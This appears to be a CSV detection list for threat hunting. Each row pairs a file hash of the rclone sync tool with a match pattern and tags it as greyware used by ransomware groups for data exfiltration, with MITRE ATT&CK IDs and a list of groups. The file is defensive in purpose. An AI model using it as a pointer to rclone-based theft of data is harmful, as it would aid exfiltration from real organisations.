"*08780d6ee4b09412225b966f301ef86b8bc9cd4bb39c79a9ef9a0a30062a4ce7*",".{0,1000}08780d6ee4b09412225b966f301ef86b8bc9cd4bb39c79a9ef9a0a30062a4ce7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*08dd1192aa3840bd9b1b5f0949f0377d27bca65f4e7dff37ec81daf4599795c3*",".{0,1000}08dd1192aa3840bd9b1b5f0949f0377d27bca65f4e7dff37ec81daf4599795c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*08ddaf402175aaeae32e29f98347d5e97b894f549e9c0c9fe1276fb7f2fb5db0*",".{0,1000}08ddaf402175aaeae32e29f98347d5e97b894f549e9c0c9fe1276fb7f2fb5db0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*08fac0b039b25bd7d18d79fd618ae5b75c49574102d2946db1fc2f275a19ff67*",".{0,1000}08fac0b039b25bd7d18d79fd618ae5b75c49574102d2946db1fc2f275a19ff67.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*090b4b082caa554812f341ae26ea6758b40338836122595d6283c60c39eb5a97*",".{0,1000}090b4b082caa554812f341ae26ea6758b40338836122595d6283c60c39eb5a97.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09240b41bc7ac8c3ece03ee6262ea8b019cbb3cf191c35fb761d6888eadf5c4f*",".{0,1000}09240b41bc7ac8c3ece03ee6262ea8b019cbb3cf191c35fb761d6888eadf5c4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*095b8583d9fb99dc593ffe604e5c40bd57e24b471e8b6cd84fd8cdbd81ae3d04*",".{0,1000}095b8583d9fb99dc593ffe604e5c40bd57e24b471e8b6cd84fd8cdbd81ae3d04.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09825c8818a296f345bd6296dc4ebbc4df00d11c10580ffc06dd485cb8451fab*",".{0,1000}09825c8818a296f345bd6296dc4ebbc4df00d11c10580ffc06dd485cb8451fab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09a4130590a298593cd3685484703c60c9e4981ae795885e800ecf6c90d02f71*",".{0,1000}09a4130590a298593cd3685484703c60c9e4981ae795885e800ecf6c90d02f71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09a433cb1c6cdbf2f851487e969a462ee015856af50e1e88e9298d9472040187*",".{0,1000}09a433cb1c6cdbf2f851487e969a462ee015856af50e1e88e9298d9472040187.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09cbf17e7d795725b162f94d0f3234c5782200c691a76fab4b3e026cd2e1d691*",".{0,1000}09cbf17e7d795725b162f94d0f3234c5782200c691a76fab4b3e026cd2e1d691.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*09e0a6d142c1b6961d1b632542319dc33b97d66a6c625c7088cde89c62b4ed26*",".{0,1000}09e0a6d142c1b6961d1b632542319dc33b97d66a6c625c7088cde89c62b4ed26.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0a4d45de276a41b9c54290e68e9456d2f755914b8e30109b329383717daff59a*",".{0,1000}0a4d45de276a41b9c54290e68e9456d2f755914b8e30109b329383717daff59a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0a7a6426d5e23cad778a82f4a7b0697350b2e4d7adb5ac55db63356406f399fc*",".{0,1000}0a7a6426d5e23cad778a82f4a7b0697350b2e4d7adb5ac55db63356406f399fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0a80ed2036c5a15822118f892272d819010c0f6b0856d8c4360bb1f8c5039c46*",".{0,1000}0a80ed2036c5a15822118f892272d819010c0f6b0856d8c4360bb1f8c5039c46.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0ad89df3db2ab0dbbfe6e7e0f943d7c57154119d1f8c3be80b7254780ab7c5ac*",".{0,1000}0ad89df3db2ab0dbbfe6e7e0f943d7c57154119d1f8c3be80b7254780ab7c5ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0b44e69ab4b77120146dc0e8373afc0fdd09889eea1e8bea172ff97a0213730d*",".{0,1000}0b44e69ab4b77120146dc0e8373afc0fdd09889eea1e8bea172ff97a0213730d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0ba22bd4f6df92dbc7692a669d8663300d99d7a74275903d3054c8a9fb4c6522*",".{0,1000}0ba22bd4f6df92dbc7692a669d8663300d99d7a74275903d3054c8a9fb4c6522.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0baadab16b2bd3ed7d10d966255c362e0710beaf24ef777f63a27e41e0983079*",".{0,1000}0baadab16b2bd3ed7d10d966255c362e0710beaf24ef777f63a27e41e0983079.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0bad6f375d4fbe97b07720bf4d81767cd51fdd09acec6ee64399fd902704599b*",".{0,1000}0bad6f375d4fbe97b07720bf4d81767cd51fdd09acec6ee64399fd902704599b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0be41303879df031d5f222dad7db73011d7b3753a39840380211767037a8a310*",".{0,1000}0be41303879df031d5f222dad7db73011d7b3753a39840380211767037a8a310.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0c6765d8b03582b3f474770d4bedd235792a896d079c541b75d1757807daae1c*",".{0,1000}0c6765d8b03582b3f474770d4bedd235792a896d079c541b75d1757807daae1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0c74d8fb887691e04e865e3b6bc32e8af47c3e54a9922ffdbed38c8323e281c9*",".{0,1000}0c74d8fb887691e04e865e3b6bc32e8af47c3e54a9922ffdbed38c8323e281c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0c7d97d7909d08d4423b444bd4e475eb863dc9c57bbe002c770cb15e915aa8c1*",".{0,1000}0c7d97d7909d08d4423b444bd4e475eb863dc9c57bbe002c770cb15e915aa8c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0c8170f2892a5479618553897c042024ab2058af5e4255a46c0ba63deb1727d0*",".{0,1000}0c8170f2892a5479618553897c042024ab2058af5e4255a46c0ba63deb1727d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0cbf79a249738f27da092c9cfd1d97fc2a533ee1f15553f4ad3d9606145fea30*",".{0,1000}0cbf79a249738f27da092c9cfd1d97fc2a533ee1f15553f4ad3d9606145fea30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0ccd8d079be2eda18c896a8776b982a0a9e2d7b59e3764a150dd22bf54b9cf55*",".{0,1000}0ccd8d079be2eda18c896a8776b982a0a9e2d7b59e3764a150dd22bf54b9cf55.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0cdca1cfe564a433a8c32d514a25dc86d35c29a28511878834e825f4a333c29d*",".{0,1000}0cdca1cfe564a433a8c32d514a25dc86d35c29a28511878834e825f4a333c29d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0ce4d8b829709b17c098e5405ddfb62e1c7fb4d7a7abcc58424f97a75d86419e*",".{0,1000}0ce4d8b829709b17c098e5405ddfb62e1c7fb4d7a7abcc58424f97a75d86419e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0d04bf172b67dd122712b067dbd1e53f958c4ef8c54490d907ca86c7e666b7ec*",".{0,1000}0d04bf172b67dd122712b067dbd1e53f958c4ef8c54490d907ca86c7e666b7ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0d0522c91a58990fb696342ab2b03ef6ae1585cc0e37d358d36edcc567dfdab6*",".{0,1000}0d0522c91a58990fb696342ab2b03ef6ae1585cc0e37d358d36edcc567dfdab6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0d29aadf342a6962c930d7291fc266bd4bb87756c3b96bc4a8d8589de59f22eb*",".{0,1000}0d29aadf342a6962c930d7291fc266bd4bb87756c3b96bc4a8d8589de59f22eb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0d8bf8b7460681f7906096a9d37eedecc5a1d1d3ad17652e68f0c6de104c2412*",".{0,1000}0d8bf8b7460681f7906096a9d37eedecc5a1d1d3ad17652e68f0c6de104c2412.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0d92df6cbf264c19eeae098f67a24215e131e63c981116732be537600856f9c1*",".{0,1000}0d92df6cbf264c19eeae098f67a24215e131e63c981116732be537600856f9c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0dfc977e19f814b462af81a7d493d16dcbd8c55ac584eb75da6654a9bb885050*",".{0,1000}0dfc977e19f814b462af81a7d493d16dcbd8c55ac584eb75da6654a9bb885050.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*0e086b861b0e4276718da0db900f80377403e367ca03a3a62f7c44ff909556f6*",".{0,1000}0e086b861b0e4276718da0db900f80377403e367ca03a3a62f7c44ff909556f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
